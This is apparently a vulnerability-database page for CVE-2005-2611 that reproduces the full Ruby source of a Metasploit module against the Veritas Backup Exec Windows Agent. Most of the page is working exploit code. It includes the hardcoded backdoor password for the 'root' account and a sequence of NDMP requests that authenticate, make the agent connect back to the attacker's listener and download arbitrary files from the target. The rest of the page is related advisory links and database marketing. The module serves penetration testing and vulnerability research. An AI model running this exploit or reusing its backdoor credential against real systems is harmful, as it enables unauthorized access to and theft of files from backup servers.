Lucene search
K

Veritas Backup Exec Windows Remote File Access

🗓️ 18 Feb 2007 00:10:39Reported by hdm <[email protected]>, UnknownType 
metasploit
 metasploit
🔗 www.rapid7.com👁 35 Views

Veritas Backup Exec Windows Remote File Access module exploits logic flaw to download arbitrary files from the system in 'MTF' format. Affects all known versions

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2005-2611
29 May 201815:50
circl
CVE
CVE-2005-2611
17 Aug 200504:00
cve
Cvelist
CVE-2005-2611
17 Aug 200504:00
cvelist
Kaspersky
KLA10377 WLF vulnerability in Veritas Backup Exec
17 Aug 200500:00
kaspersky
NVD
CVE-2005-2611
17 Aug 200504:00
nvd
Packet Storm
Veritas Backup Exec Windows Remote File Access
31 Aug 202400:00
packetstorm
Tenable Nessus
VERITAS Backup Exec Remote Agent Static Password Arbitrary File Download
12 Aug 200500:00
nessus
CERT
VERITAS Backup Exec uses hard-coded authentication credentials
12 Aug 200500:00
cert
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::NDMP

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Veritas Backup Exec Windows Remote File Access',
      'Description'    => %q{
        This module abuses a logic flaw in the Backup Exec Windows Agent to download
        arbitrary files from the system. This flaw was found by someone who wishes to
        remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
        output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
        listed in the references section. To transfer an entire directory, specify a
        path that includes a trailing backslash.
      },
      'Author'         => [ 'hdm', 'Unknown' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2005-2611'],
          ['OSVDB', '18695'],
          ['BID', '14551'],
          ['URL', 'https://web.archive.org/web/20120227144337/http://www.fpns.net/willy/msbksrc.lzh'],
        ],
      'Actions'     =>
        [
          ['Download', 'Description' => 'Download arbitrary file']
        ],
      'DefaultAction' => 'Download'
      ))

    register_options(
      [
        Opt::RPORT(10000),
        OptAddressLocal.new('LHOST',
          [
            false,
            "The local IP address to accept the data connection"
          ]
        ),
        OptPort.new('LPORT',
          [
            false,
            "The local port to accept the data connection"
          ]
        ),
        OptString.new('RPATH',
          [
            true,
            "The remote filesystem path to download",
            "C:\\Windows\\win.ini"
          ]
        ),
        OptString.new('LPATH',
          [
            true,
            "The local filename to store the exported data",
            "backupexec_dump.mtf"
          ]
        ),
      ])
  end

  def run
    print_status("Attempting to retrieve #{datastore['RPATH']}...")

    lfd = File.open(datastore['LPATH'], 'wb')

    connect
    data = ndmp_recv()
    if (not data)
      print_error("Did not receive a response from the agent")
      disconnect
      return
    end

    username = "root"
    password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"

    #
    # Authenticate using the backdoor password
    #
    auth = [
      1,
      Time.now.to_i,
      0,
      0x0901,
      0,
      0,
      2,
      username.length,
      username,
      password
    ].pack('NNNNNNNNA*A*')

    print_status("Sending magic authentication request...")
    ndmp_send(auth)
    data = ndmp_recv()
    if (not data)
      print_error("Did not receive a response to our authentication request")
      disconnect
      return
    end


    #
    # Create our listener for the data connection
    #
    print_status("Starting our data listener...")
    sfd = Rex::Socket.create_tcp_server(
      'LocalPort' => datastore['LPORT']
    )

    local_addr = (datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']))
    local_port = sfd.getsockname[2]

    #
    # Create the DATA_CONNECT request
    #
    conn = [
      3,
      0,
      0,
      0x040a,
      0,
      0,
      1,
      Rex::Socket.resolv_nbo(local_addr, false),
      local_port
    ].pack('NNNNNNNA4N')

    print_status("Sending data connection request...")
    ndmp_send(conn)
    data = ndmp_recv()
    if (not data)
      print_error("Did not receive a response to our data connection request")
      sfd.close
      disconnect
      return
    end

    #
    # Wait for the agent to connect back
    #
    print_status("Waiting for the data connection...")
    rfd = sfd.accept()
    sfd.close


    #
    # Create the Mover Set Record Size request
    #
    msrs = [
      4,
      0,
      0,
      0x0a08,
      0,
      0,
      0x8000
    ].pack('NNNNNNN')

    print_status("Sending transfer parameters...")
    ndmp_send(msrs)
    data = ndmp_recv()
    if (not data)
      print_error("Did not receive a response to our parameters request")
      disconnect
      return
    end

    #
    # Define our transfer parameters
    #
    xenv =
    [
      ['USERNAME', ''],
      ['BU_EXCLUDE_ACTIVE_FILES', '0'],
      ['FILESYSTEM', "\"\\\\#{datastore['RHOST']}\\#{datastore['RPATH']}\",v0,t0,l0,n0,f0"]
    ]

    #
    # Create the DATA_START_BACKUP request
    #
    bkup = [
      5,
      0,
      0,
      0x0401,
      0,
      0,
      4
    ].pack('NNNNNNN')
    bkup += "dump"
    bkup += [ xenv.length ].pack('N')

    #
    # Encode the transfer parameters
    #
    xenv.each do |e|
      k,v = e

      # Variable
      bkup += [k.length].pack('N')
      bkup += k
      bkup += Rex::Encoder::NDR.align(k)

      # Value
      bkup += [v.length].pack('N')
      bkup += v
      bkup += Rex::Encoder::NDR.align(v)
    end

    bkup[-1, 1] = "\x01"

    print_status("Sending backup request...")
    ndmp_send(bkup)
    data = ndmp_recv()
    if (not data)
      print_error("Did not receive a response to our backup request")
      disconnect
      return
    end

    #
    # Create the GET_ENV request
    #
    genv = [
      5,
      0,
      0,
      0x4004,
      0,
      0
    ].pack('NNNNNN')

    print_status("Sending environment request...")
    ndmp_send(genv)
    data = ndmp_recv()
    if (not data)
      print_error("Did not receive a response to our environment request")
      disconnect
      return
    end

    #
    # Start transferring data
    #
    print_status("Transferring data...")
    bcnt = 0

    begin
      while (data = rfd.get_once)
        bcnt += data.length
        lfd.write(data)
      end
    rescue ::EOFError
    end

    lfd.close
    rfd.close

    print_status("Transferred #{bcnt} bytes.")
    disconnect

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jan 2024 20:02Current
7.2High risk
Vulners AI Score7.2
CVSS 210
EPSS0.87026
35